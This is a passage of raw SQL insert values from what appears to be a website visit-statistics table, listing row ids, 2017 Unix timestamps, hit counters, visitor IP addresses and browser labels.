(161889,1506709743,1,1,0,0,'51.255.65.10','other'),(161890,1506709752,1,1,0,0,'95.108.181.49','other'),(161891,1506709988,1,1,0,0,'51.255.65.41','other'),(161892,1506710187,1,1,0,0,'66.249.64.29','chrome'),(161893,1506710217,1,1,0,0,'137.74.207.120','other'),(161894,1506710955,1,1,0,0,'51.255.65.85','other'),(161895,1506711112,1,1,0,0,'37.9.113.54','other'),(161896,1506711582,1,1,0,0,'207.46.13.92','other'),(161897,1506711675,1,1,0,0,'51.255.65.10','other'),(161898,1506711763,1,1,0,0,'51.255.65.37','other'),(161899,1506711794,1,1,0,0,'66.249.70.29','chrome'),(161900,1506711797,1,1,0,0,'217.182.132.16','other'),(161901,1506711945,1,1,0,0,'51.255.65.6','other'),(161902,1506711958,1,1,0,0,'51.255.65.69','other'),(161903,1506712057,1,1,0,0,'157.55.39.45','other'),(161904,1506712078,1,1,0,0,'108.59.8.80','other'),(161905,1506712151,1,1,0,0,'51.255.65.30','other'),(161906,1506712373,1,1,0,0,'164.132.164.180','other'),(161907,1506712425,1,1,0,0,'217.182.132.37','other'),(161908,1506712505,1,0,1,0,'66.249.64.29',''),(161909,1506712512,1,1,0,0,'51.255.65.88','other'),(161910,1506712598,1,1,0,0,'51.255.71.117','other'),(161911,1506712716,1,1,0,0,'164.132.162.164','other'),(161912,1506712749,1,1,0,0,'51.255.65.47','other'),(161913,1506712904,1,1,0,0,'217.182.132.31','other'),(161914,1506712959,1,0,1,0,'66.249.64.30',''),(161915,1506713274,1,1,0,0,'8.29.198.26','other'),(161916,1506713481,1,1,0,0,'51.255.65.31','other'),(161917,1506713490,1,1,0,0,'217.182.132.151','other'),(161918,1506713780,1,1,0,0,'164.132.162.187','other'),(161919,1506714237,1,1,0,0,'217.182.132.71','other'),(161920,1506714457,1,0,1,0,'66.249.64.29',''),(161921,1506714605,1,1,0,0,'51.255.65.38','other'),(161922,1506714863,1,1,0,0,'217.182.132.52','other'),(161923,1506714885,1,1,0,0,'51.255.71.110','other'),(161924,1506714907,1,1,0,0,'217.182.132.183','other'),(161925,1506715106,1,1,0,0,'51.255.65.94','other'),(161926,1506715168,2,2,0,0,'217.182.132.61','other'),(161927,1506715196,1,1,0,0,'217.182.132.25','other'),(161928,1506715519,1,1,0,0,'51.255.65.61','other'),(161929,1506715535,1,1,0,0,'137.74.207.116','other'),(161930,1506715578,1,1,0,0,'217.182.132.15','other'),(161931,1506715631,1,1,0,0,'5.45.207.9','other'),(161932,1506715733,1,1,0,0,'66.249.64.29','chrome'),(161933,1506715892,1,1,0,0,'51.255.71.121','other'),(161934,1506716389,1,1,0,0,'51.255.65.55','other'),(161935,1506716536,1,1,0,0,'217.182.132.28','other'),(161936,1506716688,1,1,0,0,'51.255.71.113','other'),(161937,1506717229,1,1,0,0,'217.182.132.16','other'),(161938,1506717371,1,1,0,0,'51.255.71.100','other'),(161939,1506717380,1,0,1,0,'66.249.64.30',''),(161940,1506718533,1,1,0,0,'217.182.132.5','other'),(161941,1506718565,1,1,0,0,'5.9.155.37','other'),(161942,1506718946,1,1,0,0,'66.249.70.25','chrome'),(161943,1506719056,1,1,0,0,'216.244.66.237','other'),(161944,1506719735,1,1,0,0,'51.255.65.50','other'),(161945,1506719756,1,0,1,0,'68.180.229.52',''),(161946,1506719847,2,2,0,0,'137.74.207.161','other'),(161947,1506719993,1,0,1,0,'66.249.70.25',''),(161948,1506720097,1,1,0,0,'51.255.65.57','other'),(161949,1506720333,1,1,0,0,'5.45.207.64','other'),(161950,1506720337,1,0,1,0,'66.249.64.30',''),(161951,1506720366,1,1,0,0,'217.182.132.80','other'),(161952,1506720706,1,0,1,0,'66.249.70.27',''),(161953,1506720740,1,1,0,0,'217.182.132.193','other'),(161954,1506720754,1,1,0,0,'217.182.132.188','other'),(161955,1506721102,1,0,1,0,'68.180.229.52',''),(161956,1506721180,1,0,1,0,'66.249.64.29',''),(161957,1506721263,1,1,0,0,'51.255.65.6','other'),(161958,1506721435,1,1,0,0,'217.182.132.87','other'),(161959,1506721469,1,1,0,0,'217.182.132.35','other'),(161960,1506721565,1,1,0,0,'51.255.65.97','other'),(161961,1506721834,1,0,1,0,'66.249.64.30',''),(161962,1506721950,1,1,0,0,'137.74.207.114','other'),(161963,1506722019,1,1,0,0,'51.255.71.111','other'),(161964,1506722057,1,1,0,0,'51.255.65.26','other'),(161965,1506722084,1,1,0,0,'217.182.132.33','other'),(161966,1506722113,1,1,0,0,'157.55.39.45','other'),(161967,1506722266,2,2,0,0,'51.255.71.133','other'),(161968,1506722620,1,1,0,0,'217.182.132.171','other'),(161969,1506722885,1,1,0,0,'217.182.132.67','other'),(161970,1506722950,1,1,0,0,'66.249.64.28','chrome'),(161971,1506723293,1,1,0,0,'51.255.65.14','other'),(161972,1506723404,1,1,0,0,'137.74.207.170','other'),(161973,1506723644,1,1,0,0,'184.169.218.209','chrome'),(161974,1506723672,1,1,0,0,'51.255.65.29','other'),(161975,1506723798,1,1,0,0,'141.8.183.10','other'),(161976,1506723817,1,1,0,0,'51.255.65.8','other'),(161977,1506723869,1,1,0,0,'217.182.132.178','other'),(161978,1506723877,1,1,0,0,'51.255.65.41','other'),(161979,1506723987,1,1,0,0,'217.182.132.22','other'),(161980,1506724112,1,1,0,0,'8.29.198.26','other'),(161981,1506724317,1,1,0,0,'51.255.65.19','other'),(161982,1506724325,1,1,0,0,'216.244.66.237','other'),(161983,1506725031,1,1,0,0,'207.46.13.92','other'),(161984,1506725813,1,1,0,0,'217.182.132.185','other'),(161985,1506725826,1,0,1,0,'66.249.70.27',''),(161986,1506725871,2,2,0,0,'91.209.11.236','other'),(161987,1506726061,1,1,0,0,'217.182.132.187','other'),(161988,1506726471,1,1,0,0,'51.255.65.16','other'),(161989,1506726551,1,1,0,0,'51.255.65.41','other'),(161990,1506726579,1,0,1,0,'66.249.64.29',''),(161991,1506726688,1,1,0,0,'51.255.65.42','other'),(161992,1506726808,1,1,0,0,'217.182.132.190','other'),(161993,1506726854,1,1,0,0,'51.255.65.44','other'),(161994,1506726868,1,1,0,0,'217.182.132.175','other'),(161995,1506726915,1,1,0,0,'51.255.71.119','other'),(161996,1506726916,1,1,0,0,'66.249.70.29','chrome'),(161997,1506726939,1,1,0,0,'217.182.132.81','other'),(161998,1506726945,1,1,0,0,'51.255.65.70','other'),(161999,1506727660,1,1,0,0,'217.182.132.23','other'),(162000,1506727759,1,1,0,0,'217.182.132.16','other'),(162001,1506727840,1,1,0,0,'217.182.132.37','other'),(162002,1506728075,2,2,0,0,'51.255.65.82','other'),(162003,1506728311,1,1,0,0,'51.255.65.37','other'),(162004,1506728336,1,1,0,0,'91.209.11.236','other'),(162005,1506728406,1,1,0,0,'51.255.65.67','other'),(162006,1506728417,1,1,0,0,'164.132.162.153','other'),(162007,1506728567,1,1,0,0,'217.182.132.36','other'),(162008,1506728981,1,1,0,0,'217.182.132.190','other'),(162009,1506729464,1,1,0,0,'217.182.132.91','other'),(162010,1506729609,1,1,0,0,'51.255.65.25','other'),(162011,1506729645,1,1,0,0,'217.182.132.16','other'),(162012,1506729865,1,1,0,0,'51.255.65.32','other'),(162013,1506730997,1,1,0,0,'51.255.65.48','other'),(162014,1506731180,1,1,0,0,'217.182.132.153','other'),(162015,1506731312,1,1,0,0,'51.255.65.34','other'),(162016,1506731643,1,1,0,0,'217.182.132.190','other'),(162017,1506731832,1,1,0,0,'217.182.132.14','other'),(162018,1506731906,3,3,0,0,'35.193.114.205','other'),(162019,1506731949,1,1,0,0,'217.182.132.60','other'),(162020,1506732375,1,1,0,0,'91.209.11.236','other'),(162021,1506732407,1,1,0,0,'217.182.132.92','other'),(162022,1506732466,1,1,0,0,'217.182.132.72','other'),(162023,1506732681,1,1,0,0,'217.182.132.54','other'),(162024,1506732879,3,3,0,0,'35.193.114.205','other'),(162025,1506732921,1,1,0,0,'51.255.65.68','other'),(162026,1506732984,1,1,0,0,'51.255.65.89','other'),(162027,1506733104,1,1,0,0,'217.182.132.156','other'),(162028,1506733124,1,1,0,0,'217.182.132.27','other'),(162029,1506733333,1,1,0,0,'51.255.65.92','other'),(162030,1506733376,1,1,0,0,'217.182.132.71','other'),(162031,1506733465,1,1,0,0,'51.255.65.224','other'),(162032,1506733678,1,1,0,0,'217.182.132.170','other'),(162033,1506734077,1,1,0,0,'51.255.65.69','other'),(162034,1506734169,1,1,0,0,'51.255.65.26','other'),(162035,1506734200,1,1,0,0,'35.193.114.205','other'),(162036,1506734217,1,0,1,0,'68.180.230.153',''),(162037,1506734399,1,1,0,0,'217.182.132.81','other'),(162038,1506734720,1,1,0,0,'51.255.65.17','other'),(162039,1506734762,1,1,0,0,'217.182.132.82','other'),(162040,1506734948,1,1,0,0,'8.29.198.27','other'),(162041,1506735175,5,5,0,0,'35.193.114.205','other'),(162042,1506735301,1,1,0,0,'51.255.65.4','other'),(162043,1506735427,1,1,0,0,'217.182.132.35','other'),(162044,1506735675,1,1,0,0,'217.182.132.174','other'),(162045,1506735732,1,1,0,0,'91.209.11.236','other'),(162046,1506735787,1,1,0,0,'51.255.71.123','other'),(162047,1506735793,2,2,0,0,'51.255.65.31','other'),(162048,1506735813,1,1,0,0,'51.255.71.114','other'),(162049,1506735853,1,1,0,0,'217.182.132.180','other'),(162050,1506736170,1,1,0,0,'51.255.65.48','other'),(162051,1506736453,1,1,0,0,'66.249.64.29','chrome'),(162052,1506736511,1,1,0,0,'51.255.65.9','other'),(162053,1506736530,1,1,0,0,'51.255.65.53','other'),(162054,1506736645,1,1,0,0,'217.182.132.58','other'),(162055,1506736940,1,1,0,0,'51.255.65.62','other'),(162056,1506737235,1,1,0,0,'217.182.132.22','other'),(162057,1506737275,1,1,0,0,'164.132.162.187','other'),(162058,1506737422,1,1,0,0,'195.238.108.89','firefox'),(162059,1506737515,1,1,0,0,'217.182.132.86','other'),(162060,1506737533,1,1,0,0,'51.255.65.81','other'),(162061,1506737542,1,1,0,0,'217.182.132.182','other'),(162062,1506737921,1,1,0,0,'217.182.132.150','other'),(162063,1506737991,1,1,0,0,'217.182.132.97','other'),(162064,1506738157,1,1,0,0,'35.193.114.205','other'),(162065,1506738295,1,1,0,0,'217.182.132.81','other'),(162066,1506738313,1,1,0,0,'164.132.162.155','other'),(162067,1506738442,1,1,0,0,'51.255.65.75','other'),(162068,1506738784,1,1,0,0,'217.182.132.76','other'),(162069,1506739221,1,1,0,0,'51.255.71.98','other'),(162070,1506739268,2,2,0,0,'91.209.11.236','other'),(162071,1506739332,1,1,0,0,'217.182.132.68','other'),(162072,1506739358,1,1,0,0,'35.193.114.205','other'),(162073,1506739883,1,1,0,0,'217.182.132.51','other'),(162074,1506740256,1,1,0,0,'217.182.132.14','other'),(162075,1506740349,1,0,1,0,'68.180.229.52',''),(162076,1506740427,1,1,0,0,'180.76.15.30','other'),(162077,1506740440,1,1,0,0,'217.182.132.152','other'),(162078,1506740623,1,1,0,0,'217.182.132.65','other'),(162079,1506740760,1,1,0,0,'216.244.66.237','other'),(162080,1506740895,1,1,0,0,'207.46.13.55','other'),(162081,1506741040,1,1,0,0,'217.182.132.76','other'),(162082,1506741246,1,1,0,0,'51.255.65.6','other'),(162083,1506741605,1,1,0,0,'35.193.114.205','other'),(162084,1506741774,1,1,0,0,'217.182.132.91','other'),(162085,1506741825,2,2,0,0,'178.158.85.189','firefox'),(162086,1506742107,1,1,0,0,'137.74.207.109','other'),(162087,1506742148,1,1,0,0,'217.182.132.76','other'),(162088,1506742536,1,0,1,0,'66.249.76.109',''),(162089,1506742909,1,1,0,0,'217.182.132.64','other'),(162090,1506743010,1,1,0,0,'51.255.65.93','other'),(162092,1506743119,1,0,1,0,'66.249.64.15',''),(162093,1506743213,1,1,0,0,'51.255.65.76','other'),(162094,1506743249,1,1,0,0,'51.255.71.101','other'),(162095,1506743354,1,1,0,0,'51.255.71.120','other'),(162096,1506743444,1,1,0,0,'217.182.132.28','other'),(162097,1506743694,1,1,0,0,'35.193.114.205','other'),(162098,1506743931,1,1,0,0,'217.182.132.64','other'),(162099,1506744145,1,1,0,0,'164.132.162.160','other'),(162100,1506744297,1,1,0,0,'51.255.65.84','other'),(162101,1506744314,1,1,0,0,'95.108.181.95','other'),(162102,1506744315,1,1,0,0,'37.9.113.122','other'),(162103,1506744834,1,1,0,0,'51.255.71.110','other'),(162104,1506744837,1,1,0,0,'51.255.71.111','other'),(162105,1506744852,1,1,0,0,'107.167.104.76','opera'),(162106,1506744979,1,1,0,0,'217.182.132.170','other'),(162107,1506745201,1,0,1,0,'66.249.64.28',''),(162108,1506745263,1,0,1,0,'66.249.70.27',''),(162109,1506745332,1,1,0,0,'51.255.71.130','other'),(162110,1506745379,1,1,0,0,'217.182.132.53','other'),(162111,1506745723,1,1,0,0,'5.45.207.12','other'),(162112,1506745735,1,1,0,0,'51.255.65.35','other'),(162113,1506745789,1,1,0,0,'8.29.198.27','other'),(162114,1506745963,1,1,0,0,'217.182.132.55','other'),(162115,1506746157,1,1,0,0,'216.244.66.237','other'),(162116,1506746242,1,1,0,0,'51.255.65.32','other'),(162117,1506746542,1,1,0,0,'87.250.224.46','other'),(162118,1506746641,1,1,0,0,'217.182.132.67','other'),(162119,1506747223,1,1,0,0,'137.74.207.108','other'),(162120,1506747367,1,1,0,0,'51.255.71.101','other'),(162121,1506747380,1,1,0,0,'217.182.132.93','other'),(162122,1506747384,1,1,0,0,'51.255.65.23','other'),(162123,1506747726,1,1,0,0,'217.182.132.22','other'),(162124,1506747842,1,0,1,0,'68.180.229.52',''),(162125,1506747847,1,1,0,0,'217.182.132.67','other'),(162126,1506747973,1,1,0,0,'51.255.65.56','other'),(162127,1506747986,2,2,0,0,'51.255.65.81','other'),(162128,1506748043,1,1,0,0,'51.255.71.100','other'),(162129,1506748101,1,1,0,0,'51.255.65.8','other'),(162130,1506748254,1,0,1,0,'66.249.64.29',''),(162131,1506748448,1,1,0,0,'51.255.65.7','other'),(162132,1506748525,1,1,0,0,'216.244.66.237','other'),(162133,1506748740,1,1,0,0,'95.132.41.54','chrome'),(162134,1506749580,1,1,0,0,'217.182.132.180','other'),(162135,1506749774,1,0,1,0,'68.180.229.52',''),(162136,1506749915,1,1,0,0,'217.182.132.157','other'),(162137,1506749919,2,2,0,0,'5.9.156.43','other'),(162138,1506749995,1,1,0,0,'207.46.13.92','other'),(162139,1506750246,1,1,0,0,'217.182.132.173','other'),(162140,1506750382,1,1,0,0,'46.48.13.161','chrome'),(162141,1506750780,1,1,0,0,'217.182.132.71','other'),(162142,1506750862,1,0,1,0,'66.249.64.30',''),(162143,1506750939,1,1,0,0,'137.74.201.100','other'),(162144,1506751158,1,1,0,0,'51.255.71.127','other'),(162145,1506751173,1,1,0,0,'217.182.132.73','other'),(162146,1506751180,1,1,0,0,'216.244.66.237','other'),(162147,1506751266,1,1,0,0,'137.74.207.119','other'),(162148,1506751300,1,1,0,0,'217.182.132.92','other'),(162149,1506751579,1,1,0,0,'51.255.65.90','other'),(162150,1506751637,1,1,0,0,'51.255.71.123','other'),(162151,1506751796,1,1,0,0,'217.182.132.154','other'),(162152,1506752265,1,1,0,0,'217.182.132.185','other'),(162153,1506752436,1,1,0,0,'217.182.132.17','other'),(162154,1506752545,1,1,0,0,'217.182.132.54','other'),(162155,1506752763,1,1,0,0,'51.255.65.7','other'),(162156,1506752917,1,1,0,0,'51.255.65.77','other'),(162157,1506753229,1,0,1,0,'68.180.230.153',''),(162158,1506753380,1,0,1,0,'66.249.64.29',''),(162159,1506753555,1,1,0,0,'51.255.65.38','other'),(162160,1506753764,1,1,0,0,'217.182.132.80','other'),(162161,1506753888,1,1,0,0,'216.244.66.237','other'),(162162,1506754139,1,1,0,0,'51.255.65.52','other'),(162163,1506754192,1,1,0,0,'51.255.71.127','other'),(162164,1506754366,1,1,0,0,'217.182.132.55','other'),(162165,1506754483,1,1,0,0,'217.182.132.192','other'),(162166,1506754489,1,1,0,0,'51.255.65.23','other'),(162167,1506754570,1,0,1,0,'68.180.230.153',''),(162168,1506754609,1,1,0,0,'5.45.207.9','other'),(162169,1506754697,1,1,0,0,'217.182.132.59','other'),(162170,1506754842,1,1,0,0,'217.182.132.7','other'),(162171,1506754933,1,1,0,0,'51.255.65.95','other'),(162172,1506754976,2,2,0,0,'80.241.214.123','other'),(162173,1506755208,1,1,0,0,'91.196.178.133','chrome'),(162174,1506755258,1,1,0,0,'51.255.65.224','other'),(162175,1506755329,1,1,0,0,'157.55.39.195','other'),(162176,1506755392,1,1,0,0,'51.255.71.121','other'),(162177,1506755454,1,1,0,0,'51.255.65.14','other'),(162178,1506755561,1,1,0,0,'217.182.132.83','other'),(162179,1506755638,1,1,0,0,'51.255.65.61','other'),(162180,1506755831,1,1,0,0,'137.74.207.101','other'),(162181,1506755857,1,1,0,0,'5.45.207.9','other'),(162182,1506755908,1,0,1,0,'66.249.70.25',''),(162183,1506756036,1,1,0,0,'178.154.171.75','other'),(162184,1506756132,2,2,0,0,'164.132.164.180','other'),(162185,1506756495,1,1,0,0,'217.182.132.84','other'),(162186,1506756633,1,1,0,0,'8.29.198.27','other'),(162187,1506756738,1,1,0,0,'217.182.132.59','other'),(162188,1506757063,1,1,0,0,'51.255.65.67','other'),(162189,1506757111,1,1,0,0,'217.182.132.61','other'),(162190,1506757135,1,1,0,0,'51.255.65.39','other'),(162191,1506757275,1,1,0,0,'217.182.132.87','other'),(162192,1506757584,1,1,0,0,'51.255.71.100','other'),(162193,1506757601,1,1,0,0,'164.132.162.155','other'),(162194,1506757998,1,1,0,0,'51.255.65.14','other'),(162195,1506758151,1,1,0,0,'51.255.65.23','other'),(162196,1506758454,2,2,0,0,'54.165.59.7','other'),(162197,1506758617,1,1,0,0,'217.182.132.93','other'),(162198,1506758850,1,1,0,0,'51.255.71.132','other'),(162199,1506758960,1,1,0,0,'217.182.132.20','other'),(162200,1506759310,1,1,0,0,'217.182.132.37','other'),(162201,1506759332,1,1,0,0,'164.132.162.156','other'),(162202,1506759449,1,1,0,0,'51.255.71.133','other'),(162203,1506759489,1,1,0,0,'51.255.65.76','other'),(162204,1506759539,1,1,0,0,'217.182.132.6','other'),(162205,1506759544,1,1,0,0,'51.255.65.21','other'),(162206,1506759577,1,1,0,0,'217.182.132.34','other'),(162207,1506759814,2,2,0,0,'91.209.11.236','other'),(162208,1506759907,1,1,0,0,'51.255.65.72','other'),(162209,1506759962,1,1,0,0,'141.8.142.74','other'),(162210,1506760236,5,5,0,0,'54.165.59.7','other'),(162211,1506760557,1,1,0,0,'151.80.27.116','other'),(162212,1506760652,1,1,0,0,'51.255.65.69','other'),(162213,1506760654,1,1,0,0,'82.145.221.45','chrome'),(162214,1506760694,1,1,0,0,'51.255.65.82','other'),(162215,1506760806,1,1,0,0,'51.255.65.93','other'),(162216,1506760845,1,1,0,0,'141.8.142.53','other'),(162217,1506760849,1,1,0,0,'5.45.207.64','other'),(162218,1506761255,1,1,0,0,'217.182.132.21','other'),(162219,1506761304,1,1,0,0,'216.244.66.237','other'),(162220,1506761327,1,1,0,0,'217.182.132.64','other'),(162221,1506761611,1,1,0,0,'51.255.71.116','other'),(162222,1506761619,1,1,0,0,'51.255.71.115','other'),(162223,1506761765,1,1,0,0,'51.255.65.15','other'),(162224,1506761970,1,1,0,0,'54.165.59.7','other'),(162225,1506761998,1,1,0,0,'217.182.132.152','other'),(162226,1506762128,1,1,0,0,'217.182.132.14','other'),(162227,1506762242,1,1,0,0,'217.182.132.172','other'),(162228,1506762310,1,1,0,0,'51.255.65.27','other'),(162229,1506762549,1,1,0,0,'5.166.209.43','firefox'),(162230,1506763082,1,1,0,0,'51.255.65.22','other'),(162231,1506763265,1,1,0,0,'51.255.65.57','other'),(162232,1506763344,1,1,0,0,'51.255.65.29','other'),(162233,1506763379,1,1,0,0,'137.74.207.110','other'),(162234,1506763420,1,1,0,0,'51.255.71.113','other'),(162235,1506763448,1,0,1,0,'68.180.229.52',''),(162236,1506763912,1,1,0,0,'217.182.132.67','other'),(162237,1506764760,1,1,0,0,'51.255.65.41','other'),(162238,1506764765,1,1,0,0,'217.182.132.18','other'),(162239,1506764998,2,2,0,0,'91.209.11.236','other'),(162240,1506765124,1,1,0,0,'91.196.178.133','chrome'),(162241,1506765291,1,1,0,0,'217.182.132.80','other'),(162242,1506765464,1,1,0,0,'51.255.71.125','other'),(162243,1506765661,1,1,0,0,'51.255.65.13','other'),(162244,1506766049,1,1,0,0,'51.255.65.80','other'),(162245,1506766092,1,1,0,0,'51.255.65.17','other'),(162246,1506766164,1,1,0,0,'217.182.132.180','other'),(162247,1506766194,1,1,0,0,'217.182.132.80','other'),(162248,1506766483,2,0,2,0,'68.180.229.52',''),(162249,1506766497,2,2,0,0,'5.45.207.9','other'),(162250,1506766514,1,1,0,0,'51.255.65.30','other'),(162251,1506766528,1,1,0,0,'217.182.132.95','other'),(162252,1506766845,1,1,0,0,'51.255.65.69','other'),(162253,1506767164,1,1,0,0,'217.182.132.51','other'),(162254,1506767330,1,1,0,0,'164.132.162.158','other'),(162255,1506767399,1,1,0,0,'217.182.132.151','other'),(162256,1506767472,1,1,0,0,'8.29.198.25','other'),(162257,1506767561,1,1,0,0,'51.255.71.120','other'),(162258,1506767824,1,1,0,0,'93.74.212.147','firefox'),(162259,1506768054,1,1,0,0,'51.255.65.224','other'),(162260,1506768495,1,1,0,0,'51.255.65.16','other'),(162261,1506768549,1,1,0,0,'51.255.65.31','other'),(162262,1506768831,1,1,0,0,'137.74.207.101','other'),(162263,1506768966,1,1,0,0,'217.182.132.27','other'),(162264,1506769013,1,1,0,0,'217.182.132.88','other'),(162265,1506769239,1,1,0,0,'37.9.113.87','other'),(162266,1506769440,1,1,0,0,'217.69.133.4','other'),(162267,1506769938,1,1,0,0,'137.74.201.99','other'),(162268,1506770180,1,0,1,0,'66.249.64.28',''),(162269,1506770365,1,1,0,0,'51.255.65.8','other'),(162270,1506770413,1,1,0,0,'217.182.132.84','other'),(162271,1506770416,1,1,0,0,'217.182.132.70','other'),(162272,1506770452,1,1,0,0,'217.182.132.186','other'),(162273,1506770455,1,1,0,0,'217.182.132.97','other'),(162274,1506770471,1,1,0,0,'37.110.144.32','msie'),(162275,1506770493,1,1,0,0,'5.45.207.64','other'),(162276,1506770753,1,1,0,0,'51.255.65.70','other'),(162277,1506770854,1,1,0,0,'217.182.132.59','other'),(162278,1506771071,1,1,0,0,'217.182.132.152','other'),(162279,1506771145,1,0,1,0,'68.180.229.52',''),(162280,1506771518,1,1,0,0,'51.255.65.62','other'),(162281,1506771546,1,1,0,0,'178.154.171.75','other'),(162282,1506771696,1,1,0,0,'51.255.65.12','other'),(162283,1506771912,1,1,0,0,'172.98.193.43','chrome'),(162284,1506772200,1,1,0,0,'51.255.65.39','other'),(162285,1506772369,1,1,0,0,'51.255.65.87','other'),(162286,1506772392,1,1,0,0,'5.45.207.64','other'),(162287,1506772744,1,0,1,0,'66.249.70.29',''),(162288,1506773003,1,1,0,0,'51.255.65.94','other'),(162289,1506773184,1,1,0,0,'87.250.224.46','other'),(162290,1506773187,1,1,0,0,'95.108.213.11','other'),(162291,1506773255,1,1,0,0,'51.255.65.59','other'),(162292,1506773682,1,1,0,0,'37.9.113.200','other'),(162293,1506773713,1,1,0,0,'178.154.171.28','other'),(162294,1506775425,1,0,1,0,'66.249.64.29',''),(162295,1506775557,1,1,0,0,'51.255.65.91','other'),(162296,1506775933,1,0,1,0,'68.180.230.153',''),(162297,1506776121,1,1,0,0,'185.195.17.245','chrome'),(162298,1506776169,1,1,0,0,'217.182.132.185','other'),(162299,1506776199,1,1,0,0,'180.76.15.144','other'),(162300,1506776527,1,0,1,0,'66.249.64.29',''),(162301,1506776776,1,1,0,0,'157.55.39.45','other'),(162302,1506776808,1,1,0,0,'217.182.132.70','other'),(162303,1506777039,1,1,0,0,'137.74.207.109','other'),(162304,1506777654,1,1,0,0,'217.182.132.83','other'),(162305,1506777655,1,0,1,0,'68.180.229.52',''),(162306,1506777886,1,1,0,0,'176.31.231.10','other'),(162307,1506778309,1,1,0,0,'8.29.198.27','other'),(162308,1506778557,1,1,0,0,'5.45.207.9','other'),(162309,1506778647,1,1,0,0,'51.255.65.82','other'),(162310,1506778690,1,1,0,0,'217.182.132.7','other'),(162311,1506779422,1,0,1,0,'68.180.230.153',''),(162312,1506780045,1,1,0,0,'164.132.162.187','other'),(162313,1506780995,1,1,0,0,'5.45.207.9','other'),(162314,1506781197,1,1,0,0,'217.182.132.240','other'),(162315,1506781336,1,1,0,0,'51.255.65.18','other'),(162316,1506782115,1,1,0,0,'217.182.132.59','other'),(162317,1506782578,1,0,1,0,'68.180.229.52',''),(162318,1506782657,1,1,0,0,'217.182.132.175','other'),(162319,1506782852,1,1,0,0,'217.182.132.14','other'),(162320,1506783563,1,1,0,0,'217.182.132.182','other'),(162321,1506783812,1,0,1,0,'66.249.64.29',''),(162322,1506784094,1,1,0,0,'217.182.132.5','other'),(162323,1506784259,1,1,0,0,'217.182.132.193','other'),(162324,1506784454,1,1,0,0,'217.182.132.60','other'),(162325,1506784800,1,1,0,0,'217.182.132.186','other'),(162326,1506785562,1,1,0,0,'207.46.13.55','other'),(162327,1506785608,1,1,0,0,'5.45.207.9','other'),(162328,1506785867,1,1,0,0,'217.182.132.179','other'),(162329,1506785892,1,1,0,0,'137.74.207.108','other'),(162330,1506786322,1,1,0,0,'217.182.132.61','other'),(162331,1506786517,1,1,0,0,'176.31.231.10','other'),(162332,1506786762,1,1,0,0,'217.182.132.66','other'),(162333,1506786799,1,1,0,0,'137.74.207.161','other'),(162334,1506787187,1,1,0,0,'5.45.207.9','other'),(162335,1506787253,1,1,0,0,'91.209.11.236','other'),(162336,1506787358,1,1,0,0,'164.132.162.164','other'),(162337,1506787522,1,1,0,0,'51.255.65.59','other'),(162338,1506787662,1,1,0,0,'5.45.207.64','other'),(162339,1506787748,1,1,0,0,'107.167.108.52','opera'),(162340,1506787749,1,1,0,0,'51.255.65.71','other'),(162341,1506788095,3,3,0,0,'5.45.207.9','other'),(162342,1506788389,1,1,0,0,'91.209.11.236','other'),(162343,1506788673,1,1,0,0,'217.182.132.146','other'),(162344,1506789149,1,1,0,0,'8.29.198.25','other'),(162345,1506789314,1,1,0,0,'91.209.11.236','other'),(162346,1506789745,1,1,0,0,'51.255.65.45','other'),(162347,1506790411,1,1,0,0,'5.45.207.64','other'),(162348,1506790741,1,0,1,0,'68.180.229.52',''),(162349,1506791165,1,1,0,0,'51.255.71.119','other'),(162350,1506791212,1,1,0,0,'5.45.207.9','other'),(162351,1506791251,1,1,0,0,'217.182.132.171','other'),(162352,1506792024,1,1,0,0,'217.182.132.74','other'),(162353,1506792339,1,1,0,0,'217.182.132.64','other'),(162354,1506792577,1,1,0,0,'217.182.132.179','other'),(162355,1506792654,2,2,0,0,'217.182.132.32','other'),(162356,1506792893,1,1,0,0,'51.255.65.55','other'),(162357,1506793057,1,0,1,0,'68.180.230.153',''),(162358,1506793358,2,0,2,0,'66.249.64.30',''),(162359,1506793657,1,0,1,0,'66.249.70.27',''),(162360,1506793659,1,0,1,0,'68.180.229.52',''),(162361,1506793997,1,1,0,0,'217.182.132.30','other'),(162362,1506794063,1,1,0,0,'91.196.178.100','chrome'),(162363,1506794374,1,1,0,0,'217.182.132.174','other'),(162364,1506796239,1,1,0,0,'51.255.71.112','other'),(162365,1506796893,1,1,0,0,'217.182.132.186','other'),(162366,1506797035,1,1,0,0,'91.209.11.236','other'),(162367,1506797512,2,0,2,0,'66.249.64.28',''),(162368,1506797765,1,0,1,0,'66.249.70.29',''),(162369,1506797838,1,1,0,0,'51.255.71.115','other'),(162370,1506798143,1,1,0,0,'164.132.162.156','other'),(162371,1506798292,1,1,0,0,'164.132.162.155','other'),(162372,1506798339,1,1,0,0,'51.255.65.67','other'),(162373,1506798439,1,1,0,0,'51.255.65.23','other'),(162374,1506799047,1,1,0,0,'51.255.65.34','other'),(162375,1506799434,1,1,0,0,'217.182.132.177','other'),(162376,1506799519,1,1,0,0,'180.76.15.162','other'),(162377,1506799913,1,1,0,0,'5.45.207.9','other'),(162378,1506799982,1,1,0,0,'8.29.198.25','other'),(162379,1506800112,1,1,0,0,'199.58.86.211','other'),(162380,1506800172,1,1,0,0,'51.255.65.34','other'),(162381,1506800191,1,1,0,0,'207.46.13.55','other'),(162382,1506800322,1,0,1,0,'66.249.64.30',''),(162383,1506800457,1,1,0,0,'51.255.65.21','other'),(162384,1506800708,1,0,1,0,'68.180.230.153',''),(162385,1506800820,1,1,0,0,'217.182.132.58','other'),(162386,1506800929,1,1,0,0,'51.255.65.90','other'),(162387,1506801039,1,1,0,0,'40.77.167.44','other'),(162388,1506801597,1,0,1,0,'66.249.70.25',''),(162389,1506801964,1,1,0,0,'51.255.65.7','other'),(162390,1506802451,1,1,0,0,'137.74.201.108','other'),(162391,1506802597,1,1,0,0,'217.182.132.173','other'),(162392,1506802614,1,1,0,0,'217.182.132.31','other'),(162393,1506803224,1,0,1,0,'68.180.229.52',''),(162394,1506803311,1,1,0,0,'217.182.132.4','other'),(162395,1506803312,1,1,0,0,'217.182.132.6','other'),(162396,1506804019,1,1,0,0,'217.182.132.63','other'),(162397,1506804457,1,1,0,0,'217.182.132.81','other'),(162398,1506804599,1,1,0,0,'141.8.142.74','other'),(162399,1506805212,1,1,0,0,'37.9.113.87','other'),(162400,1506805215,2,2,0,0,'5.45.207.64','other'),(162401,1506805566,1,1,0,0,'217.69.133.68','other'),(162402,1506805575,1,1,0,0,'217.182.132.52','other'),(162403,1506805642,1,1,0,0,'5.45.207.9','other'),(162404,1506805981,1,0,1,0,'68.180.230.153',''),(162405,1506806070,1,0,1,0,'66.249.64.28',''),(162406,1506806794,1,1,0,0,'164.132.162.158','other'),(162407,1506807127,1,1,0,0